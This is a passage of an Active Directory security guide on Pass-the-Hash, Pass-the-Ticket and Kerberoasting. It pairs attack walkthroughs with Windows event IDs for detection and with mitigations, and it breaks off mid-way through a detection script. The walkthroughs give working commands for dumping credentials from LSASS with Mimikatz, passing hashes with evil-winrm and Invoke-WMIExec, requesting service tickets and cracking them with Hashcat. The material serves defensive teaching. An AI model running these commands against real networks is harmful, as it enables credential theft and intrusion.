Active Directory Security Guide

The complete Active Directory security manual
Exploitation, detection and mitigation strategies

Table of contents

Introduction
Active Directory
Attack technique 1: Use Alternate Authentication Material (T1550)
Attack technique 2: Kerberoasting
Attack technique 3: Golden Ticket attack
Attack technique 4: DCShadow attack
Attack technique 5: AS-REP Roasting
Attack technique 6: LDAP injection attack
Attack technique 7: PetitPotam NTLM relay attack against Active Directory Certificate Services (AD CS)
Conclusion
References

Introduction

Active Directory (AD), introduced with Windows 2000, has become an integral part of modern organizations and serves as the backbone of the identity infrastructure for 90% of Fortune 1000 companies. Organizations adopt it for its simplicity and its centralized management: employees reach resources and applications with a single set of credentials, which raises productivity and efficiency [3], and administrators manage users, computers and resource access from a single point of control [4].

However, because of its ubiquity and its architectural limitations, Active Directory becomes a liability in the event of a breach and a priority target for adversaries seeking to elevate privileges, spread to many systems and launch devastating attacks such as data exfiltration, full domain compromise and ransomware.

The biggest challenges in recovering from a breach are identifying the source, determining the extent of the damage and building a new, trustworthy environment. According to the Verizon 2022 Data Breach Investigations Report [5], 80% of breaches come from external actors, and, as noted in IBM's 2021 Cost of a Data Breach Report, once a domain administrator account is compromised attackers can hide inside the network for up to 277 days before detection, which represents a significant threat [6].

Widespread use and the ease with which employees reach resources make it hard for organizations to retire on-premises Active Directory and adopt more secure alternatives such as Microsoft Azure Active Directory (AAD). The move to AAD addresses some of AD's limitations by automating administrative tasks such as user management and group membership assignment, improving efficiency [7]. The same security risks still apply, however, because a compromise of the identity infrastructure has devastating consequences whichever directory is in use. Adversaries can also abuse Microsoft Endpoint Manager to move laterally from an Azure tenant to an on-premises AD domain, creating attack paths between otherwise separate identity management environments [8].

The importance of Active Directory security cannot be overstated. Organizations must be prepared with disaster recovery plans and careful monitoring to stop attacks before the system is damaged beyond repair. The choice between AD and AAD will depend largely on the needs and resources of the organization, but the risk of compromise remains regardless of the choice. Safe and effective use of Active Directory requires a clear understanding of the potential risks and a commitment to sound security practices and protocols.

Active Directory

Active Directory (AD) is the directory service that manages network resources in Windows-based networks. It centralizes the management of user and computer accounts, resources and security policies, and so lets administrators run a network efficiently and securely through a hierarchical structure.

That structure consists of domains at the top level with objects such as users, computers and groups nested inside them. It is designed to organize resource management and to ensure that security policies are applied uniformly across the network.

Clients and applications query and modify the directory over the Lightweight Directory Access Protocol (LDAP), a protocol for managing distributed directory services over an IP network; domain controllers replicate with one another over RPC. For authentication AD uses Kerberos, a ticket-based protocol that ensures only authorized users and computers can reach network resources, which strengthens network security.

To manage resources at scale, Active Directory uses Group Policy Objects (GPOs). GPOs enforce security settings, deploy software and carry out other administrative tasks across the network. AD also supports remote procedure calls (RPC), which allow administrators to manage resources remotely from a central location regardless of where those resources sit.

Active Directory is not immune to attack, however, and a compromise can have disastrous consequences for the whole network. Successful Active Directory attacks consist of three main steps: discovery, privilege escalation through the theft of valid account credentials, and access to other computers in the network or domain. Once attackers have a foothold in the target network, they immediately shift to gaining elevated access to additional systems that bring them closer to their final objective, such as encrypting or exfiltrating the organization's data.

In short, Active Directory is a vital component for managing and protecting the resources of Windows-based networks. Its hierarchical structure and its functions (LDAP, Kerberos, GPOs and RPC) provide efficient and secure management of network resources. Keeping the network secure therefore requires protecting Active Directory with solid security measures and keeping its protocols and configuration up to date, so that unauthorized access to network resources is prevented.

Attack technique 1:
Use Alternate Authentication Material (T1550)

Adversaries can bypass normal access controls by using alternate authentication material, such as password hashes, Kerberos tickets and application access tokens, in place of a password. This technique, catalogued as T1550 in the MITRE ATT&CK framework, lets attackers move laterally within an environment and gain unauthorized access.

This section describes two sub-techniques of Use Alternate Authentication Material (T1550): Pass the Hash (T1550.002) and Pass the Ticket (T1550.003).

Pass the Hash (T1550.002)

Pass-the-Hash (PtH) is an identity-based attack that adversaries use to reach additional systems and privileges within a network once they have already compromised one host.

In a typical Pass-the-Hash scenario, adversaries:

obtain initial access to a target network,
steal or dump the hashed credentials of a user, and
use the stolen hash to create a new logon session on the compromised host and authenticate from it to other systems.

Pass-the-Hash is a distinctive form of credential theft in which an attacker abuses the Windows NT LAN Manager (NTLM) authentication protocol to authenticate to a remote system with the precomputed hash of a user's password. When a user logs on to a Windows system that relies on NTLM, the system computes the NTLM hash (more precisely, the NT hash) of the password without salting, the technique that otherwise strengthens password hashes stored on servers and domain controllers.

A hash is the fixed-size digest produced by a one-way mathematical function that accepts input of any length (as long as a novel or as short as an 8-character password) and returns a fixed-length string. Because such functions are designed to be one-way, meaning that given the output it should be computationally infeasible to recover the plaintext input, hashing passwords remains a standard defence against credential theft in data breaches.

NTLM is a challenge/response protocol that verifies a user's identity without ever sending the password: the server sends a challenge, and the client answers with a value computed from that challenge and the NT hash. The hash is therefore all the client needs. This attack requires no cracking tools at all, because the plaintext password is never needed, and the time-consuming cracking step disappears.

If an attacker obtains a user's NT hash, whether by dumping it from LSASS memory, extracting it from the [Link] of the file %systemroot%\system32\config\SAM, capturing it from network traffic, or lifting it from a backup or a system image, they can pass that hash to any remote system that recognises the compromised account. Depending on the privileges and access level of that user, adversaries can gain full access to the system and move laterally.

Note that this is not a vulnerability in the usual sense but a deliberate design decision of NTLM, intended to reduce friction and improve the overall user experience.
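The reason a hash alone suffices can be seen by walking through one NTLMv2 exchange on both sides. The Python below is an added example and is not code from this guide: it follows MS-NLMP section 3.3.2, takes the NT hash that this guide later shows for the user Alice (a0c8746a6efc7782c7c19c55185145be), and constructs everything else (domain name, server and client challenges, timestamp and target-info block).

```python
"""NTLMv2 challenge/response computed from the NT hash alone (MS-NLMP 3.3.2).

Added example, not part of the original guide. The NT hash is the one the
guide shows for "Alice"; domain name, challenges, timestamp and target
info are constructed for the demonstration.
"""
import hmac
import hashlib
import struct


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    # ResponseKeyNT = HMAC_MD5(NT hash, UTF-16LE(UPPER(user) + domain)).
    # The password never appears: MD4(password), i.e. the NT hash, is all the client needs.
    return hmac_md5(nt_hash, (user.upper() + domain).encode("utf-16-le"))


def av_pair(av_id: int, value: bytes) -> bytes:
    # One AV_PAIR of the target-info block: AvId, AvLen, Value
    return struct.pack("<HH", av_id, len(value)) + value


def ntlmv2_temp(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    # "temp" = RespType(1) HiRespType(1) Z(6) Time(8) ClientChallenge(8) Z(4) TargetInfo Z(4)
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def make_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes,
                  client_challenge: bytes, timestamp: int, target_info: bytes):
    """Client side (or an attacker holding the hash): NtChallengeResponse and session base key."""
    key = ntowf_v2(nt_hash, user, domain)
    temp = ntlmv2_temp(timestamp, client_challenge, target_info)
    nt_proof = hmac_md5(key, server_challenge + temp)
    session_base_key = hmac_md5(key, nt_proof)
    return nt_proof + temp, session_base_key


def server_verify(nt_hash: bytes, user: str, domain: str, server_challenge: bytes,
                  response: bytes) -> bool:
    """Server side (or the DC over Netlogon): recompute NTProofStr from the stored NT hash."""
    if len(response) < 16:
        return False
    nt_proof, temp = response[:16], response[16:]
    expected = hmac_md5(ntowf_v2(nt_hash, user, domain), server_challenge + temp)
    return hmac.compare_digest(expected, nt_proof)


# Constructed scenario: the hash Mimikatz dumped for Alice and a made-up file server FS01
ALICE_NT = bytes.fromhex("a0c8746a6efc7782c7c19c55185145be")
DOMAIN = "DOMAIN"
TARGET_INFO = (av_pair(2, DOMAIN.encode("utf-16-le"))      # MsvAvNbDomainName
               + av_pair(1, "FS01".encode("utf-16-le"))     # MsvAvNbComputerName
               + av_pair(0, b""))                           # MsvAvEOL
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")        # nonce from CHALLENGE_MESSAGE
CLIENT_CHALLENGE = bytes.fromhex("aaaaaaaaaaaaaaaa")        # client nonce; random in real clients
TIMESTAMP = 133_000_000_000_000_000                         # FILETIME, arbitrary


def pass_the_hash_demo() -> dict:
    """Attacker answers FS01's challenge using only the hash; FS01 accepts it."""
    response, sbk = make_response(ALICE_NT, "Alice", DOMAIN, SERVER_CHALLENGE,
                                  CLIENT_CHALLENGE, TIMESTAMP, TARGET_INFO)
    return {
        "accepted": server_verify(ALICE_NT, "Alice", DOMAIN, SERVER_CHALLENGE, response),
        # A captured response is worthless against a fresh challenge; the hash is not.
        "replay_accepted": server_verify(ALICE_NT, "Alice", DOMAIN,
                                         bytes.fromhex("fedcba9876543210"), response),
        "nt_proof": response[:16].hex(),
        "session_base_key": sbk.hex(),
    }


if __name__ == "__main__":
    for k, v in pass_the_hash_demo().items():
        print(f"{k}: {v}")
```

The server never sees a password; it compares HMAC-MD5 values computed from the stored NT hash, which is why the hash is a static password-equivalent until the password changes. A captured response, on the other hand, is bound to one server challenge and cannot be replayed, as the replay_accepted field shows. The practical consequence is that disabling NTLM for the accounts that matter (Network security: Restrict NTLM, or Protected Users membership) is what removes this path, not any hardening of how the response is computed.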

Tools and techniques for executing Pass-the-Hash attacks

Pass-the-Hash (PtH) attacks can be executed with several publicly available tools, such as Mimikatz [9] and evil-winrm [10], as well as with PowerShell scripts. Attackers typically use these tools to extract the hash from the memory of a compromised system and then use it to gain access to other systems on the network.

Tool 1: Mimikatz

Using Mimikatz for a Pass-the-Hash attack consists of three main steps.

Step 1: Steal the password hash

To list the users who have recently logged on together with their credentials, adversaries typically use the sekurlsa module of Mimikatz, which combines several techniques, including parsing of memory structures and calls to the Windows API, to extract authentication data from LSASS memory. The module's logonpasswords command specifically extracts logon-session data such as password hashes and cached credentials. This can include the current user's logon data as well as that of other users who have logged on to the same machine.

Note that before running sekurlsa::logonpasswords the attacker must run the privilege::debug command so that Mimikatz can open LSASS.

By default LSASS runs at high integrity and is protected from being read by unauthorized processes. By enabling the debug privilege (SeDebugPrivilege, which local administrators hold by default) the attacker can open a handle to LSASS and read the logon-session data from its memory. If LSASS runs as a protected process (RunAsPPL), an extra step such as loading a driver is needed first.

An example output of step one:

PS> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

Authentication Id : 0 ; 302247 (00000000:00049ca7)
Session           : UndefinedLogonType from 0
User Name         : Alice
Domain            : DOMAIN
Logon Server      : DC1
Logon Time        : 01/12/2023 [Link]
SID               : S-1-5-21-3501040295-3816137123-30697657-1109
        msv :
         Primary
         * Username : Alice
         * Domain   : DOMAIN
         * NTLM     : a0c8746a6efc7782c7c19c55185145be

With this NTLM hash, adversaries move to the second stage.

Note that Mimikatz is not the only way to dump NTLM hashes. Adversaries also use other built-in command-line utilities or third-party tools, such as ProcDump and Gsecdump, for credential dumping.

Step 2: Authenticate with the stolen password hash

This is the main step, in which the adversary passes the hash to impersonate the user and obtain access to remote systems.

The sekurlsa::pth command of Mimikatz performs the Pass-the-Hash. It lets an attacker start a process that authenticates to remote systems with the captured NTLM hash of a user's password, without the real password. To run it, the attacker only has to supply the following parameters:

/user: (the username),
/domain: (the domain name), and
/ntlm: (the NTLM hash of the user's password).

Note that Windows does not hold NTLM keys only: it also stores Kerberos keys derived from the password with the AES-128 and AES-256 encryption types. If the attacker has one of those keys instead, the /aes128: or /aes256: parameter replaces /ntlm:, and the injected session can then obtain Kerberos tickets (overpass-the-hash) without ever putting NTLM on the wire.

PS> .\mimikatz.exe "sekurlsa::pth /user:Alice /domain:[Link] /ntlm:a0c8746a6efc7782c7c19c55185145be"

user    : Alice
domain  : [Link]
program : [Link]
impers. : no
NTLM    : a0c8746a6efc7782c7c19c55185145be
. . .

Nothing more than the username and the NTLM hash of the victim's password was needed. The new process still runs under the attacker's local identity; only its network authentication uses Alice's credentials (the equivalent of runas /netonly), so every connection it makes to another host is made as Alice.

Step 3: Access resources as the new user

In the third step the attacker uses the newly obtained identity to expand access across the network. For example, the adversary can use the PsExec command-line utility to execute code on another host.

For instance, the attacker can run the following command to launch the process "[Link]" on the remote machine with the internal IP address "[Link]":

psexec.exe \\[Link] [Link]

Mimikatz is not the only way to carry out a Pass-the-Hash attack; adversaries often use PowerShell as well.

Tool 2: PowerShell

It is common for adversaries to use Invoke-WMIExec, a PowerShell function that executes arbitrary commands on a remote Windows machine over Windows Management Instrumentation (WMI), to carry out a PtH attack.

Note that Invoke-WMIExec is not a built-in cmdlet: it is part of the open-source Invoke-TheHash toolkit and implements NTLMv2 authentication itself, which is what lets it accept a hash instead of a password. The function can be loaded into a PowerShell session (dot-sourced or imported with Import-Module) or embedded in a script, and it runs on the PowerShell already present on any recent Windows system.

Because it rides on PowerShell and WMI, both legitimate management channels, and needs no compiled binary on disk, an attack with Invoke-WMIExec tends to be less conspicuous than dropping a tool such as Mimikatz.

For example, holding the password hash of the user Alice from the previous scenario, an adversary can run the following command:

Invoke-WMIExec -Target [Link] -Username Alice -Hash a0c8746a6efc7782c7c19c55185145be -Command hostname

Here the adversary uses Invoke-WMIExec to run the hostname command on the remote machine with the internal IP address [Link].

Tool 3: evil-winrm

evil-winrm is a Ruby gem that provides remote command execution on a Windows machine over the Windows Remote Management (WinRM) protocol. Because evil-winrm is not a built-in tool, adversaries must install it before use; several installation options are described in its GitHub repository [10].

In a Pass-the-Hash attack with evil-winrm, the attacker specifies the username, the NTLM hash and the IP address of the target as parameters [14].

For example, the following command carries out a PtH attack against the Windows machine with IP address [Link], using the username 'Alice' and the NTLM hash 'a0c8746a6efc7782c7c19c55185145be':

evil-winrm -u Alice -H a0c8746a6efc7782c7c19c55185145be -i [Link]

evil-winrm then opens a remote session to the target and authenticates as the specified user (Alice), after which the attacker can execute arbitrary commands on the remote machine. WinRM must be enabled and reachable (TCP 5985 or 5986) and the account must be allowed to use it, which by default means local administrators or members of the Remote Management Users group.

Detection methods for the Pass-the-Hash attack

The following event IDs help detect a possible Pass-the-Hash attack [15], [16], [17], [18]. IDs 1, 5 and 10 are Sysmon events; the 46xx IDs are Windows Security log events:

Sysmon Event ID 1: process creation.
• Key fields: LogonId, ParentProcessId, ParentImage, CurrentDirectory, CommandLine, IntegrityLevel, ParentCommandLine, UtcTime, ProcessId, User, Hashes, Image

Sysmon Event ID 5: process terminated.
• Key fields: UtcTime, ProcessId, Image

Sysmon Event ID 10: process accessed (for example, a handle to lsass.exe opened by Mimikatz or ProcDump).
• Key fields: SourceThreadId, TargetProcessId, GrantedAccess, SourceImage, TargetImage

Event ID 4624: an account was successfully logged on. On the source host, logon type 9 with logon process seclogon and authentication package Negotiate is the signature of sekurlsa::pth; on the target hosts, the resulting NTLM logons of type 3 are the other side of the same attack.
• Key fields: Account Name, Account Domain, Logon ID, Logon Type, Logon Process, Authentication Package

Event ID 4663: an attempt was made to access an object.
• Key fields: Process ID, Access Mask, Account Domain, Object Name, Process Name, Object Type, Logon ID, Handle ID

Event ID 4672: special privileges assigned to new logon.
• Key fields: Security ID, Account Name, Account Domain

Event ID 4688: a new process has been created.
• Key fields: Mandatory Label, Account Domain, Creator Process Name, New Process Name, Token Elevation Type, New Process ID, Creator Process ID

Mitigation techniques for the Pass-the-Hash attack

To reduce the risk of Pass-the-Hash attacks, organizations can implement several technical measures. One of them is enabling Windows Defender Credential Guard, a feature introduced in Windows 10 and Windows Server 2016 that uses virtualization-based security to isolate credential storage so that only trusted processes can reach it; with it enabled, sekurlsa::logonpasswords no longer returns the NT hashes of domain logons.

Another measure is to remove administrator rights from users' workstations. This limits an attacker's ability to run tools that read LSASS memory and extract hashes. Limiting the number of endpoints on which users hold administrative privileges, and never reusing administrative accounts across security boundaries (tiers), reduces the chance that one compromised credential can be used to escalate privileges.

Randomizing and storing local administrator passwords with a solution such as Microsoft's Local Administrator Password Solution (LAPS) adds a further layer, since it removes the attacker's ability to move laterally with local accounts that share the same password. It is also recommended to block local accounts from authenticating over the network, which is achieved with Group Policy ("Deny access to this computer from the network" and "Deny log on through Remote Desktop Services") applied to the well-known SIDs S-1-5-113 (Local account) and S-1-5-114 (Local account and member of Administrators group).

Pass the Ticket (T1550.003)

Pass the Ticket (PtT) is a technique in which an attacker reuses a Kerberos ticket-granting ticket (TGT) obtained earlier, typically stolen from another user's logon session. The TGT is a central piece of the Kerberos protocol: it lets a user authenticate to many systems without entering the password each time.

The TGT is issued by the domain controller (DC), acting as key distribution center, to a user after a successful authentication to the domain. It carries the user's identity, group memberships and privileges (in the PAC) and is used to request service tickets for specific services on target systems. The TGT itself is encrypted with the key of the krbtgt account, so the client can neither read nor modify it; the DC's reply that delivers it (the AS-REP) is encrypted with a key derived from the user's password, using a symmetric algorithm (RC4-HMAC or AES, depending on the Kerberos configuration). The TGT and its session key are then stored in the memory of the user's computer, in the LSASS process.

When the user wants to reach a resource on another system, the TGT is presented to the DC to request a service ticket. The service ticket is encrypted with the key of the service account and contains a new session key; the DC sends it, together with a copy of that session key encrypted under the TGT session key, back to the user's computer, where it is presented to the target system for authentication.

With a stolen TGT (and its session key), an adversary can request service tickets from the DC for any service on any system and access its resources as the victim.

Tools and techniques for executing Pass-the-Ticket attacks

Pass-the-Ticket (PtT) attacks can be executed with several publicly available tools, such as Mimikatz, Kekeo, Rubeus and creddump7. Attackers typically use these tools to extract Kerberos TGTs from the memory of a compromised system and then use them to access other systems on the network.

Tool 1: Mimikatz

Using Mimikatz for a PtT attack consists of four main steps.

Step 1: Capture Kerberos tickets of valid accounts

An attacker can run the Mimikatz command sekurlsa::tickets with the /export parameter to extract all Kerberos tickets from LSASS memory and save them as .kirbi files in the folder where the Mimikatz executable resides.

By examining the names of the .kirbi files it is possible to determine whether there are Kerberos tickets for a domain administrator, such as DOMAIN\Alice:

PS> .\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

PS> dir | find "Alice" | findstr "krbtgt"
...
[0;1e4c7df]-2-0-40e10000-Alice@[Link]
...

The second command, dir | find "Alice" | findstr "krbtgt", lists the files in the current directory, keeps those whose name contains "Alice" and then those that also contain "krbtgt". Service tickets for Alice are exported too, but only her TGTs, the ones issued for the krbtgt service, carry krbtgt in the file name, and a TGT is what the attacker wants because it can be exchanged for a service ticket to any service.

Note that Mimikatz is not the only tool for obtaining Kerberos tickets. With Rubeus (asktgt) an adversary can send raw AS-REQ traffic to request a fresh TGT for a given user, supplying either the password or an RC4, DES or AES key derived from it (overpass-the-hash), and the attack still works [22].

Step 2: Reuse the ticket

This is the main step of the Pass-the-Ticket attack.

Here the attacker uses the Mimikatz command kerberos::ptt to inject the stolen TGT into their own logon session, which gives that session the identity and permissions of the ticket's owner for subsequent access to resources, without ever knowing the plaintext credentials. The adversary can then reach resources that are otherwise protected by Kerberos authentication [23].

PS> .\mimikatz.exe "kerberos::ptt C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-Alice@[Link]"

* File: 'C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-Alice@[Link]': OK

This command injects the ticket-granting ticket (TGT) stored in the given .kirbi file into the current session.

To confirm that the right ticket was injected, an adversary can run the Mimikatz command kerberos::list:

PS> .\mimikatz.exe "kerberos::list"
aes256_hmac
   Start/End/MaxRenew: 13/01/2022 [Link] ; 13/01/2022 [Link] ; 13/01/2022 [Link]
   Server Name       : krbtgt/[Link] @ [Link]
   Client Name       : Alice @ [Link]
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;

Keep in mind that a TGT has a finite lifetime (10 hours by default, renewable for up to 7 days) and expires after that; the attacker then needs a fresh ticket, just as the legitimate user would need to re-authenticate to the domain.

Step 3: Discover the privileges of the stolen ticket

Once a ticket is ready for reuse, the attacker needs to find out what it grants, that is, where it can be used. A service ticket (TGS) only grants access to the specific service for which it was issued, and the attacker can read that from the ticket itself (the Server Name line above).

A TGT, by contrast, can be exchanged for service tickets to any service, so the attacker may need an internal discovery phase to learn what access the account actually holds. That can be as simple as checking the user's group memberships and looking for obvious signals.

Many tools can gather information about Active Directory; an attacker can also use built-in commands such as net to collect it without triggering security tooling that watches for known offensive binaries.

PS> net user Alice /domain
The request will be processed at a domain controller for domain [Link].

User name                    Alice
Full Name                    Alice Oswell
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
. . .
Local Group Memberships
Global Group memberships     *Workstation administrators *VPNuser
                             *FileServer1_PublicShare   *Domain Users
The command completed successfully.

Step 4: Access resources as the new user

Finally, the attacker can use built-in system utilities to move laterally in a quiet, operationally stealthy way, reaching other resources and advancing their objectives. For example, the adversary could use the PsExec command-line utility to run [Link] on a remote workstation.

Detection methods for the Pass-the-Ticket attack

The following event IDs, all logged on the domain controllers, help detect a possible Pass-the-Ticket attack [15], [16]:

Event ID 4768: a Kerberos authentication ticket (TGT) was requested.
• Key fields: Account Name, Service Name (always "krbtgt"), Service ID, Client Address, Ticket Encryption Type

Event ID 4769: a Kerberos service ticket was requested.
• Key fields: Account Name, Service Name, Client Address, Ticket Encryption Type

Event ID 4770: a Kerberos service ticket was renewed.
• Key fields: Account Name, User ID, Service Name, Service ID

The practical signal is a TGT being used from a client address that never obtained one: a 4769 for an account from an address with no matching successful 4768 for that account. An RC4 (0x17) ticket for an account whose other tickets are AES-encrypted is a related indicator of a ticket requested with a stolen key rather than a password.



Mitigation techniques for the Pass-the-Ticket attack

Effective measures against Pass-the-Ticket attacks focus on making tickets harder to steal and on limiting the damage a stolen ticket can do. One such measure is Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, it uses virtualization-based security to isolate credential storage, including the Kerberos TGT session key, and grants access only to trusted processes; the ticket remains usable from its own logon session, but it can no longer be exported in usable form with sekurlsa::tickets.

Another important step is to limit the number of endpoints on which users hold administrative privileges, which greatly reduces the chance that an attacker can steal a ticket in the first place, since reading LSASS requires local administrator rights. Avoiding administrative privileges that cross security boundaries is equally important, because it limits how far a stolen ticket can carry an attacker. Members of the Protected Users group additionally receive a 4-hour, non-renewable TGT and cannot be delegated, which shrinks the window in which a stolen ticket is useful.

Attack technique 2:
Kerberoasting

Kerberoasting is a technique for obtaining crackable password material for Active Directory (AD) user accounts that have servicePrincipalName (SPN) values.

In AD environments, SPNs are registered on user or computer accounts, which are then known as service accounts. These accounts run services and applications and usually need elevated privileges on the server to do their job. When a client requests a service, it uses the SPN to locate the account associated with that service, and the domain controller issues a service ticket encrypted with that account's credential, which AD stores as a password hash and as keys derived from the password.

In Kerberoasting, an attacker uses the SPN of a service account to request a service ticket (TGS). When the ticket is issued with the RC4-HMAC encryption type, the key is the NT hash of the service account's password; any authenticated domain user can request such a ticket, and no privilege on the target service is needed. An attacker who captures the ticket from network traffic or extracts it from memory therefore holds ciphertext keyed by the password hash and can run an offline brute-force attack against it to recover the plaintext password of the service account.

Note that Kerberoasting and Pass-the-Ticket are different techniques for stealing or impersonating valid credentials in a Kerberos environment.

Kerberoasting obtains the credentials of service accounts by requesting service tickets from a domain controller and cracking them offline; it yields the password of the service account, which the attacker then uses to access network resources. Pass-the-Ticket, by contrast, steals a Kerberos ticket-granting ticket (TGT) from a user's session and uses it to impersonate that user and access network resources.

Kerberoasting attacks can be executed with various publicly available tools, such as the Impacket scripts.

Tools and techniques for performing Kerberoasting

This attack does not rely on a single tool but on a combination of them: Mimikatz, Rubeus, Impacket, John the Ripper and Hashcat.

Tool 1: Impacket

A Kerberoasting attack with the Impacket scripts consists of three main parts.

Step 1: Identify SPNs and request the TGS

The first step of a Kerberoasting attack is to enumerate (identify) servicePrincipalNames and request service tickets (TGS).

Impacket's GetUserSPNs.py script performs every step needed to request a service ticket (ST) for each SPN it finds, given valid domain credentials [24]; the -request flag makes it ask for the tickets rather than merely list the SPNs:

with a password
GetUserSPNs.py -request -outputfile [Link] -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'

with an NT hash
GetUserSPNs.py -request -outputfile [Link] -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'

The command runs the GetUserSPNs.py script and specifies an output file, "[Link]", where the obtained ticket hashes are written in a cracker-ready format.

The -dc-ip flag gives the IP address of the domain controller and -outputfile the file in which the hashes are stored. DOMAIN/USER:Password, or 'DOMAIN/USER' together with -hashes, supplies the domain, user name and password or NT hash of a valid domain user with which to request the tickets; the hash form is itself a Pass-the-Hash, so no plaintext password is required at any point.

Note that adversaries can also use the CrackMapExec (CME) tool to Kerberoast against the systems listed in $TARGETS [24]:

crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting [Link] --kdcHost $KeyDistributionCenter

Here the --kerberoasting flag names the output file for the obtained hashes and --kdcHost gives the address of the domain controller.

Step 2: Offline cracking of the hash

With the ticket hashes saved in [Link], the adversary runs an offline brute-force attack to recover the plaintext password with a third-party tool such as John the Ripper or Hashcat:

john --format=krb5tgs --wordlist=$wordlist [Link]

The --format=krb5tgs flag tells John that the values in "[Link]" are Kerberos 5 TGS (Ticket Granting Service) hashes, and --wordlist points at the word list to try. John then hashes each word and checks it against the tickets until one verifies. The equivalent Hashcat mode is 13100 for RC4 tickets; tickets issued with AES (encryption types 17 and 18, Hashcat modes 19600 and 19700) are far more expensive per guess, which is why attackers request RC4 wherever the account still allows it.

Step 3: Using the new privileges to advance objectives

Once the password has been cracked, the attacker can use the service account credentials to access
network resources and advance their objectives. This may include data exfiltration, lateral movement
within the network or escalation of privileges.

Tool 2: Rubeus

The Kerberoasting attack that exploits Rubeus consists of four main parts.

Step 1: Enumerate servicePrincipalNames

The first step of a Kerberoasting attack is to identify and enumerate the service principal names (SPNs)
of the target service accounts that hold the desired privileges.

To do this, adversaries can craft custom LDAP filters to search for users with SPN values
registered in the current domain [25].

$ldapFilter = "(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"
$domain = New-Object [Link]
$search = New-Object [Link]
$[Link] = $domain
$[Link] = 1000
$[Link] = $ldapFilter
$[Link] = "Subtree"

# Run the search
$results = $[Link]()

# Show the SPN values of the returned objects
$Results = foreach ($result in $results)
{
    $result_entry = $[Link]()

    $result_entry | Select-Object @{
        Name = "Username"; Expression = { $_.sAMAccountName }
    }, @{
        Name = "SPN"; Expression = { $_.servicePrincipalName | Select-Object -First 1 }
    }
}

$Results

Please note that SPNs consist of two parts:

• the service class, and
• the host name.

The service class is the name of the service, such as 'HTTP' or 'ldap', and the host name is the
DNS host name or the IP address of the machine where the service is running. For example,
an SPN for a web server could be 'HTTP/[Link]', where 'HTTP' is the service class and
[Link] is the host name.

The possible output of this LDAP filter is the following:

Username           SPN
--------           ---
ServiceAccount1    http/webserver1
ServiceAccount2    cifs/appserver2

Step 2: TGS ticket request

An attacker can target specific service accounts by identifying and enumerating their service
principal names (SPNs) and then requesting Ticket Granting Service (TGS) tickets for these
service accounts. Tools like Rubeus can be used to automate this process, extracting
password hashes from memory [26].

PS> .\[Link] kerberoast /simple /outfile:[Link]

Action: Kerberoasting
Notice: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 2
Hash written to C:\Tools\[Link]
Roasted hashes written to: C:\Tools\[Link]

PS> Get-Content .\[Link]

$krb5tgs$23$*ServiceAccount1$[Link]$http/webserver1*$45FAD4676AECDDE4C1397BFCED441F79$DEB...

# ... truncated output ... #

Step 3: Crack the password offline

The next step in the attack is to obtain the plaintext passwords of the service accounts. This
is done through an offline brute-force attack, which means that the attacker does not need to
communicate with Active Directory, making it undetectable.

To carry out this task, the attacker can use tools such as John the Ripper or Hashcat, which are
specifically designed to crack passwords using dictionaries of common passwords:

PS> .\[Link] -m 13100 -o [Link] -a 0 .\[Link] .\[Link]

The command uses the [Link] executable and specifies the following flags:

• -m 13100: specifies the hash type, in this case Kerberos 5 TGS (Ticket Granting Service)

• -o [Link]: specifies the output file where the cracked passwords will be saved

• -a 0: specifies the attack mode, in this case 0 means a straight (dictionary) attack

The command also specifies the file paths of [Link] and [Link]. Once the command is executed,
Hashcat will attempt to find a match between the password hashes in the file [Link] and the words
in the [Link] file.

Step 4: Using the new privileges to advance objectives

Once the password has been cracked, the attacker can use the service account credentials to
access network resources and advance their objectives.

For example, with the account credentials in hand, the adversary can use the tool with the
/netonly parameter to run PowerShell as the user "ServiceAccount1".

Detection methods for the Kerberoasting attack

It is possible to identify several signs of Kerberoasting by examining the Windows event log for
unusual Ticket Granting Service (TGS) requests [27], [28].

Event ID 4769: A Kerberos service ticket was requested.

• Key description fields: Account Name, Service Name, Client Address

Event ID 4770: A Kerberos service ticket was renewed.

• Key description fields: Account Name, User ID, Service Name, Service ID
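As an added illustration of the detection logic above (editor-supplied example code, not part of the original guide), the following Python script runs two checks over a handful of constructed 4769-style records: it flags TGS requests for user-account SPNs that used a weak encryption type (RC4, 0x17, or DES), and it flags a single requester that asks for tickets to many different services within a short window. The field names, the thresholds and the sample events are assumptions made for the example; map them onto the Account Name, Service Name, Client Address and Ticket Encryption Type fields of the real event.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events shaped after Event ID 4769 (not real log data).
# Keys mirror the 4769 fields TargetUserName, ServiceName, IpAddress, TicketEncryptionType.
SAMPLE_4769 = [
    {"time": "2024-01-10T09:00:01", "account": "bob@CORP.LOCAL",        "service": "svc_http",   "client": "10.0.0.25", "etype": 0x17},
    {"time": "2024-01-10T09:00:02", "account": "bob@CORP.LOCAL",        "service": "svc_sql",    "client": "10.0.0.25", "etype": 0x17},
    {"time": "2024-01-10T09:00:02", "account": "bob@CORP.LOCAL",        "service": "svc_cifs",   "client": "10.0.0.25", "etype": 0x17},
    {"time": "2024-01-10T09:00:03", "account": "bob@CORP.LOCAL",        "service": "svc_backup", "client": "10.0.0.25", "etype": 0x17},
    {"time": "2024-01-10T09:00:04", "account": "bob@CORP.LOCAL",        "service": "krbtgt",     "client": "10.0.0.25", "etype": 0x12},
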